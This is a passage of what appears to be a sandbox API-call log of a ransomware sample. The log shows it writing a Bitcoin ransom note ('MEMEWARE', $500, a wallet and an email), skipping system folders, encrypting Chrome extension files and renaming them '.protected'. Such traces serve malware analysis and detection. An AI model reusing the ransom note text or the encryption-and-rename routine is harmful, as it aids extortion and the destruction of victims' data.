guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.157] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0079.157] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.157] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0079.157] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.157] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0079.158] CloseHandle (hObject=0x15c) returned 1 [0079.159] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0079.159] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0079.159] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\RESTORE_FILES.txt") returned 141 [0079.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0079.159] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.159] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0079.160] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.160] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0079.160] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.160] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0079.160] CloseHandle (hObject=0x158) returned 1 [0079.160] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0079.160] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="Windows") returned -1 [0079.160] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="Program Files") returned -1 [0079.160] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="Program Files (x86)") returned -1 [0079.160] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="$Recycle.bin") returned 1 [0079.161] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="System Volume Information") returned -1 [0079.161] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf") returned 123 [0079.161] lstrcmpW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2=".") returned 1 [0079.161] lstrcmpW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="..") returned 1 [0079.161] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\*") returned 125 [0079.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0079.161] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.161] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.161] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.161] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.161] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.161] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\.") returned 125 [0079.161] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.161] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.161] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.161] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.161] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.161] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.161] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.161] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\..") returned 126 [0079.161] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.161] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.161] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.161] lstrcmpiW (lpString1="14.1_0", lpString2="Windows") returned -1 [0079.161] lstrcmpiW (lpString1="14.1_0", lpString2="Program Files") returned -1 [0079.161] lstrcmpiW (lpString1="14.1_0", lpString2="Program Files (x86)") returned -1 [0079.161] lstrcmpiW (lpString1="14.1_0", lpString2="$Recycle.bin") returned 1 [0079.161] lstrcmpiW (lpString1="14.1_0", lpString2="System Volume Information") returned -1 [0079.161] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0") returned 130 [0079.161] lstrcmpW (lpString1="14.1_0", lpString2=".") returned 1 [0079.161] lstrcmpW (lpString1="14.1_0", lpString2="..") returned 1 [0079.162] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\*") returned 132 [0079.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0079.176] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.176] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.177] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.177] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.177] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\.") returned 132 [0079.177] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.177] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.177] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.177] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.177] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.177] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.177] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\..") returned 133 [0079.177] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.177] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.177] lstrcmpiW (lpString1="128.png", lpString2="Windows") returned -1 [0079.177] lstrcmpiW (lpString1="128.png", lpString2="Program Files") returned -1 [0079.177] lstrcmpiW (lpString1="128.png", lpString2="Program Files (x86)") returned -1 [0079.177] lstrcmpiW (lpString1="128.png", lpString2="$Recycle.bin") returned 1 [0079.177] lstrcmpiW (lpString1="128.png", lpString2="System Volume Information") returned -1 [0079.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png") returned 138 [0079.177] StrStrIW (lpFirst="128.png", lpSrch=".protected") returned 0x0 [0079.177] lstrcmpW (lpString1="128.png", lpString2="RESTORE_FILES.txt") returned -1 [0079.177] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.177] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png") returned 138 [0079.179] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0079.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png") returned 138 [0079.179] StrStrW (lpFirst="128.png", lpSrch=".rar") returned 0x0 [0079.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png") returned 138 [0079.179] StrStrW (lpFirst="128.png", lpSrch=".zip") returned 0x0 [0079.179] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x1a33, lpOverlapped=0x0) returned 1 [0079.183] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffe5cd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.183] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a33, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x1a33, lpOverlapped=0x0) returned 1 [0079.184] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.184] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.184] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.184] CloseHandle (hObject=0x160) returned 1 [0079.185] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.protected") returned 148 [0079.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.protected")) returned 1 [0079.185] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.185] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0079.185] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0079.185] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0079.186] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0079.186] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0079.186] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json") returned 144 [0079.186] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0079.186] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.186] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.186] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json") returned 144 [0079.186] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0079.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json") returned 144 [0079.186] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0079.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json") returned 144 [0079.186] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0079.186] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x3ec, lpOverlapped=0x0) returned 1 [0079.196] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffc14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.196] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x3ec, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x3ec, lpOverlapped=0x0) returned 1 [0079.196] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.196] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.197] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.197] CloseHandle (hObject=0x160) returned 1 [0079.197] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.protected") returned 154 [0079.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.protected")) returned 1 [0079.197] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.197] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0079.197] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0079.197] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0079.197] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0079.197] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0079.197] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 139 [0079.197] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0079.197] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0079.198] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\*") returned 141 [0079.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0079.204] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.204] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.204] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.204] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.204] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.204] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\.") returned 141 [0079.204] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.204] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.204] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.204] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.204] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.204] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.204] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.204] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\..") returned 142 [0079.204] 